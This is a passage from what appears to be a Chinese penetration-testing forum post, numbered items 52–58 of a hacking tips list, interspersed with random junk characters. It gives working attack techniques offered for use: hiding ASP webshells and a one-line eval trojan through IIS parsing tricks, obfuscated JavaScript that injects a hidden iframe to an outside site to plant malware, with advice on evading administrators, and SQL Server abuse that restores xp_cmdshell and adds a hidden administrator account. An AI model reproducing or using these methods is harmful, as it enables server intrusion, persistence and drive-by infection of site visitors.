52、at "12:17" /interactive cmd  t7 R' F& `7 \6 R+ j& i( e2 |
执行后可以用AT命令查看新加的任务
+ [( Y2 {& n- F1 |) O1 u" ~' p用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
3 Z& c6 g& [1 H( F# c) M& u/ Z1 {. ^7 H
53、隐藏ASP后门的两种方法1 j6 x1 W7 b8 _8 Q
1、建立非标准目录:mkdir images..\
0 T1 _7 S- g) x7 B- S拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp6 m/ j# H0 P+ u6 r% V. h
通过web访问ASP木马:http://ip/images../news.asp?action=login' M0 \( O7 ~$ ]$ m! w9 h
如何删除非标准目录:rmdir images..\ /s
# S# [9 p5 x2 S, M% ]6 x- G6 Q& d2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
3 y+ x2 x% S/ h+ M: a5 H4 ?7 qmkdir programme.asp
5 D% s" o9 a$ o8 \. C4 [新建1.txt文件内容:<!--#include file=”12.jpg”-->
' v) Z" H/ L; o' m1 f+ m, j新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! t1 T, f) w* o) K* }4 d
attrib +H +S programme.asp5 d( _; C/ D0 u" R4 k
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt& t4 y9 I! p% V- |

3 q8 E7 R: d8 D0 G5 J6 Z54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
1 j  Z. s# b7 ?: z% m0 L6 a然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
, R" a; q3 ~$ u) V" ]% ~3 t: \
! @- |* g, \/ ]55、JS隐蔽挂马
6 s0 v0 r7 A  l9 a: C/ t1.
4 f+ R; I, E* C5 L$ Kvar tr4c3="<iframe src=ht";
6 }) B4 n' r9 G8 L2 c- Z- ]tr4c3 = tr4c3+"tp:/";
/ S6 U8 w$ j# W3 t) s; T7 ?3 ^tr4c3 = tr4c3+"/ww";
' N' J5 R: e9 O! v; xtr4c3 = tr4c3+"w.tr4";
1 H0 t2 C2 `7 Ytr4c3 = tr4c3+"c3.com/inc/m";
! _8 l, Y9 u( Htr4c3 = tr4c3+"m.htm style="display:none"></i";
) S" ^" \: y) J, b1 `  P4 G# v8 etr4c3 =tr4c3+"frame>'";0 m6 k4 V' {7 A# l: L; u$ r- g
document.write(tr4c3);
. J4 i; H: w/ Q  g避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。1 C& W$ P0 n% P

* D# D% _7 G" W/ I2.9 ~4 L' _0 E( ^6 \8 E/ L, C
转换进制,然后用EVAL执行。如
& e) _  t+ E6 ~eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
1 v1 b* j" R, g# Q不过这个有点显眼。( ^3 _2 F* Q. s- a) P) T1 K2 {9 |
3.
5 s) p- _# U9 q5 F( Edocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
# a9 {7 k0 m6 E4 ^% `( A9 `8 h最后一点,别忘了把文件的时间也修改下。
" [6 p% j0 ^* X0 {5 K9 R* J  ?7 D% g- N0 |6 q
56.3389终端入侵常用DOS命令% H3 O  |7 N  W, p# N
taskkill taskkill /PID 1248 /t
) s5 b$ G1 R, {- _4 B: `6 G: c( x" V, L
tasklist 查进程) M. Z/ O3 ?$ z  [5 h2 A% \+ {/ z& w

5 e) y/ n( E4 g- f( G3 E+ dcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
, R- G3 p: \5 c% r1 F5 T) q' M$ qiisreset /reboot+ s: l4 M- K# r# m- H8 R2 w( k
tsshutdn /reboot /delay:1    重起服务器% g2 q9 c4 D# q. n) S. T7 B/ n; C

6 L9 Z: \9 V, e( \- Glogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,; p2 n3 i  {: z3 j6 W% `+ |) f
/ M( d& g2 W$ S7 x' a: B3 V
query user 查看当前终端用户在线情况
: k; C5 p7 K# J
- m+ G0 {% L4 J! m* x要显示有关所有会话使用的进程的信息,请键入:query process *2 [4 l, J  p, t8 J+ a2 t

4 G& `; C- p. b$ {. A( m: J要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2. o, X' ~' U: v# O& G2 v. H5 D9 K

2 W* J8 p5 C" J2 X要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2/ T( ^; ]' |  [  o; L$ h) M
+ \) n' o: i  E9 b6 [4 }
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
+ V6 z) `: M' [; p% `
2 L# }( F6 H, k3 I. f/ `3 k命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
; T: [8 S# I* d4 C5 {
1 w: a1 m4 M  ~5 o/ Z/ w命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统8 l9 N9 T& S9 f" Z5 o
' ^8 b) v  T4 Y  ?
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
3 L# m8 F7 X8 H, h' j
9 x6 [# |- G: l( f8 F3 r6 {命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
/ w6 e  Z3 X$ G$ O! Y6 V+ `( Q4 w1 a" U# O* d+ v5 Y
56、在地址栏或按Ctrl+O,输入:6 \* |( |; @" e0 d& `9 o7 ~
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
+ e; H5 H5 a1 d, x* a( F; j9 t9 m  A* a6 ~& p* c
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。6 H# q; d2 ?0 D) D/ C7 ^3 {* u
& z# ~6 {; x$ z0 U7 g/ i% Z
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
+ R) q6 w3 R( Y; A2 x4 j" E2 c用net localgroup administrators是可以看到管理组下,加了$的用户的。5 x; j. o+ ?" M* h. E
$ ^: q+ ?8 F. W1 ^" k" o9 D" j% U- S) j
58、 sa弱口令相关命令0 N( ?; G" g% o8 T; S
9 V  ~" H6 m7 Y( n! c% F4 m3 ~# F0 N$ e' v
一.更改sa口令方法:4 L" g. T: D; R
用sql综合利用工具连接后,执行命令:
& f6 a6 _+ a8 B: vexec sp_password NULL,'20001001','sa'+ W: X3 g) _) e' L; ^
(提示:慎用!)2 Z: z5 c0 J9 R7 c. R6 L/ a5 T7 c

' v# |  c) c7 M, R6 u二.简单修补sa弱口令.$ ^" Z3 m' }5 c9 l! l- N

4 W$ E# p5 v. [6 E0 }* [方法1:查询分离器连接后执行:5 r( i2 N: j" N( O
if exists (select * from
( N# [  m9 Y- d) Q, E! _5 Qdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
' u% T$ D3 G6 T1 P4 F' N  u2 U: R6 TOBJECTPROPERTY(id, N'IsExtendedProc') = 1)1 D1 k. R# f; x# c( |$ M4 `

) j/ b/ O" Y# o! Pexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'# m% e8 o  S0 b" W2 ]3 O- h

* W% S0 i# H" g6 U  C* NGO
" F7 x4 A# K4 F. S) q" w. A+ l4 p* j2 ?0 i
然后按F5键命令执行完毕% v4 y/ M9 d7 i# y8 O& J7 b8 ~  P$ K7 _

. L* Q8 @' m4 ^  Y7 j( y7 @: Z方法2:查询分离器连接后" ^  q5 t  |" Z1 U) ?% }; N% C  c
第一步执行:use master+ }9 @4 J8 x, q" a% _
第二步执行:sp_dropextendedproc 'xp_cmdshell'5 f1 K  H! ~( s- y% `  P
然后按F5键命令执行完毕6 n4 `  d2 Q& o: h8 u
# D% [6 _) u/ [& s3 t

# z! K# g, A. H* q  \三.常见情况恢复执行xp_cmdshell.; q9 O, o0 P0 v8 t4 G% i

: V) `" o  V+ B0 O6 T3 G* C: Q9 k
8 N; y1 z$ x" j/ P0 m9 Q, u% B$ m8 r: Z1 未能找到存储过程'master..xpcmdshell'.
6 O& H0 r. U+ B$ [6 c: p/ ~   恢复方法:查询分离器连接后,  |/ n3 L+ A; k" {
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int" s9 S" a) m- V" V% B, x
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'" ~4 ~4 c; h$ @+ u3 o
然后按F5键命令执行完毕
0 K: M) q! H; y7 q+ a% Z. b& c' f2 ?+ ^0 H: Z& E
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
! j! O# G& P: W恢复方法:查询分离器连接后,7 i1 Z+ Y: }; E7 q% T7 F
第一步执行:sp_dropextendedproc "xp_cmdshell"1 f6 ^4 c/ k1 L; a" D0 V. K
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, [' n  Q2 G+ z然后按F5键命令执行完毕: J! l' \0 t, R5 Q' y' B

- V1 j# u" a: q) p% a3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
+ e: ^5 Y4 @, n4 u恢复方法:查询分离器连接后,! j# K6 K+ z& J* x$ R' c4 I- U
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
+ ~: u: }9 I( j! ~) E5 f8 b! P第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
1 C8 T9 b) |4 ^( z. ~然后按F5键命令执行完毕! t7 r+ F- r: a$ C' O

/ }/ E. {* o/ X: w四.终极方法.
0 ~1 W# U3 ^! }# b6 b: c( U5 ~如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
! m( i6 O7 Y# c- O. o. L查询分离器连接后,
) R' e# J8 b! p/ Z: c2000servser系统:3 N( g/ ]2 I1 n
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'+ d6 R. B! C) M% q! {

5 H9 v2 P) ^2 [+ Y6 {9 vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
, {% M) e( z8 f" F* _. o4 a& N/ l& h" I7 F+ F/ _! K
xp或2003server系统:
1 a; r. K8 k1 G- v" }: O- t. A7 `2 N8 R3 g8 q' R
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
& }' {' J5 @: `* A2 q9 A: q4 n7 U0 B% P( p- W$ P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ c& O3 l$ W  D  `7 a




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2